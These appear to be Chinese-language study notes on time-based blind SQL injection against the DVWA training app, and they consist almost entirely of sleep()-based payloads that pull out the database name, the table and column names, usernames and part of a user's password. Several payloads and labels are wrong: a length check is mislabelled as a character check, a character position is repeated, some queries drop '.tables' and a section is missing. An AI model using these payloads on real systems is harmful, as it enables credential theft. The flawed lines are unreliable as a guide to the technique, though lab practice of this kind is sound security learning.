1.判断注入类型
1 and sleep(3) 无延迟
1' and sleep(3)# 有延迟
结论:注入类型为字符串类型
2.判断数据库名
获取数据库名
1' and if(length(database())=4,sleep(5),1)#
获取第一个字符d
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)#
获取第二个字符v
1' and if(ascii(substr(database(),2,1))=118,sleep(5),1)#
获取第三个字符w
1' and if(ascii(substr(database(),3,1))=119,sleep(5),1)#
获取第四个字符a
1' and if(ascii(substr(database(),4,1))=97,sleep(5),1)#
结论:数据表名为dvwa
3.数据表名
判断表的个数
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)#
结论:dvwa有两张表
第二个数据表记录
select table_name from information_schema where table_schema=database() limit 1,1
第二个数据表名的完整字符串
substr((select table_name from information_schema where table_schema=database() limit 1,1),1)
第二给表名的完整字符串的长度
1' and if((length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)))=5,sleep(5),1)#
结论:第一个表的长度为5
获取第二个表的第一个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117,sleep(5),1)#
获取第二个表的第二个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=115,sleep(5),1)#
获取第二个表的第三个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=101,sleep(5),1)#
获取第二个表的第四个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=114,sleep(5),1)#
获取第二个表的第五个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))=115,sleep(5),1)#
结论:第二个表名为users
5.字段名
获取users的字段数
1' and if((select count(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa')=8,sleep(5),1)#
结论:users表有8个字段
获取user字段长度
1' and if(length(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),1))=4,sleep(5),1)#
结论:user的长度为4
获取user的第一个字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),1,1))=117,sleep(5),1)#
获取user的第二个字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),2,1))=115,sleep(5),1)#
获取user的第三个字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),3,1))=101,sleep(5),1)#
获取user的第四个字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),4,1))=114,sleep(5),1)#
6.数据
获取smithy的passwd
密码的第一个字符
1' and if(length(substr((select password from users where user='smithy'limit 0,1),1))=112,sleep(5),1)#
密码的第二个字符
1' and if(ascii(substr((select password from users where user='smithy' limit 0,1),1,1))=97,sleep(5),1)#
密码的第三个字符
1' and if(ascii(substr((select password from users where user='smithy' limit 0,1),2,1))=115,sleep(5),1)#
6.数据
获取user记录数
1' and if((select count(user) from users)=5,sleep(5),1)#
结论:user有5条记录
获取smithy的长度
1' and if(length(substr((select user from users limit 4,1),1))=6,sleep(5),1)#
smithy的第一个字符
1' and if(ascii(substr((select user from users limit 4,1),1,1))=115,sleep(5),1)#
smithy的第二个字符
1' and if(ascii(substr((select user from users limit 4,1),2,1))=109,sleep(5),1)#
smithy的第三个字符
1' and if(ascii(substr((select user from users limit 4,1),3,1))=105,sleep(5),1)#
smithy的第四个字符
1' and if(ascii(substr((select user from users limit 4,1),4,1))=116,sleep(5),1)#
smithy的第五个字符
1' and if(ascii(substr((select user from users limit 4,1),5,1))=104,sleep(5),1)#
smithy的第六个字符
1' and if(ascii(substr((select user from users limit 4,1),5,1))=121,sleep(5),1)#